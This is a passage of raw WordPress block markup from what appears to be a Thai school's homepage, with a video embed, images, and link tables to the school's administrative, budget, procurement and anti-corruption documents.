wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 